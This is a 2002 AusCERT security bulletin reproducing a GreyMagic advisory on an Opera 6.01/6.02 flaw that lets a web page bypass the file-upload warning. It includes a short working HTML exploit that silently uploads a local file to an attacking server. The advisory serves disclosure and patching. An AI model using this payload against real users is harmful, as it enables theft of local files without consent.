Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2002.259 -- GreyMagic Security Advisory GM#001-OP Reading ANY local file in Opera 5 June 2002 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: Opera 6.01 Opera 6.02 Vendor: Opera Software Operating System: Windows Impact: Read-only Data Access Access Required: Remote Comments: AusCERT does not endorse experimentation with "proof of concept" demonstrations - members undertaking this do so at their own risk. Opera Changelog: http://www.opera.com/windows/changelog/log603.html - --------------------------BEGIN INCLUDED TEXT-------------------- GreyMagic Security Advisory GM#001-OP ===================================== By GreyMagic Software, Israel. 27 May 2002. Available in HTML format at http://security.greymagic.com/adv/gm001-op/. Topic: Reading ANY local file in Opera. Discovery date: 07 May 2002. Affected applications: ====================== * Opera 6.01 on Windows platforms. * Opera 6.02 on Windows platforms. Introduction: ============= >From Opera.com: * "Opera today ranks number three among the most widely used Internet browsers in the world." * "Opera is small, super-fast, secure, and can run at an optimal level without straining system resources. We like to say that we abide by The 5 S's in all code development: Speed, Size, Security, Standards Compliance and State-of-the-Art." Opera, like all browsers today, supports the <input type="file"> element, which is a standard method for users to upload files to HTTP servers. Since the file element is a very security-sensitive element, most web browsers do not allow its "value" attribute to be set (read only). If it was possible to assign an arbitrary string to the "value" attribute, an attacking server could fetch any local file by simply submitting a form (through scripting or social engineering, if scripting has been disabled). Opera's approach to the file element is a little different. The "value" attribute can be set, but before the form it resides in is submitted, a dialog comes up with the following warning: The files listed below have been selected, without your intervention, to be sent to another computer. Do you want to send these files?" Discussion: =========== It is possible to bypass the file element's confirmation dialog, which means an attacker can download any file from an unsuspecting Opera user. By appending a simple " " (HTML entity, which represents the ASCII code for a new-line character) to the end of the file element's "value" attribute, Opera's security algorithm is fooled to think that no files were assigned. Therefore, the warning dialog doesn't come up; Opera simply submits the form with the desired file chosen by an attacker. Surprisingly, versions of Opera prior to 6.01 are not vulnerable to this attack. So a change that occurred between version 6.0 and 6.01 is the culprit. This also means that all of the non-windows versions are safe (Opera did not release 6.01 for other platforms yet). Exploit: ======== This exploit will automatically transfer the file "c:/test.txt" to an attacking host, which can handle it using a server-side environment such as ASP, PHP or other solutions. It does not require any user interaction: <body onload="document.secForm.submit()"> <form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm"> <input type="file" name="expFile" value="c: est.txt " style="visibility:hidden"> </form> </body> Solution: ========= Opera was informed on 15 May 2002 and confirmed our findings. A day later, in the evening of 16 May 2002, Opera informed us that the vulnerability was fixed and committed to Opera's own version control system. On 27 May 2002, Opera released version 6.03, which addressed this issue. Opera has been extremely responsive and quick to understand and patch this vulnerability. They have shown that they truly do take security seriously. Tested on: ========== Opera 6.01, NT4. Opera 6.01, Win2000. Opera 6.01, WinXP. Opera 6.02, NT4. Opera 6.02, Win2000. Opera 6.02, WinXP. Demonstration: ============== A fully dynamic proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm001-op/. Feedback: ========= Please mail any questions or comments to security@greymagic.com. - - Copyright © 2002 GreyMagic Software. - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to use any or all of this information is the responsibility of each user or organisation, and should be done so in accordance with site policies and procedures. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the original authors to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/Information/advisories.html If you believe that your system has been compromised, contact AusCERT or your representative in FIRST (Forum of Incident Response and Security Teams). Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies. -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: ftp://ftp.auscert.org.au/pub/auscert/AUSCERT_PGP.key iQCVAwUBPP3rFyh9+71yA2DNAQGITwP8DSwuPsYU9/s0NeIY+aWBzcqM60OrfyNo pJr0kmvaahkIWkwVItHwS/pOUgPexGbWBnDncRhHa7ENsqsrZe/KJLLe9Yk+v6Qr A+mKNaGyJ/75nHiYQdcYVYYTSAUh4V3dU1D9HQ3Si/z+QnCEcZCOg2sYjVCQ+s3/ yR568MhEnUU= =gej3 -----END PGP SIGNATURE-----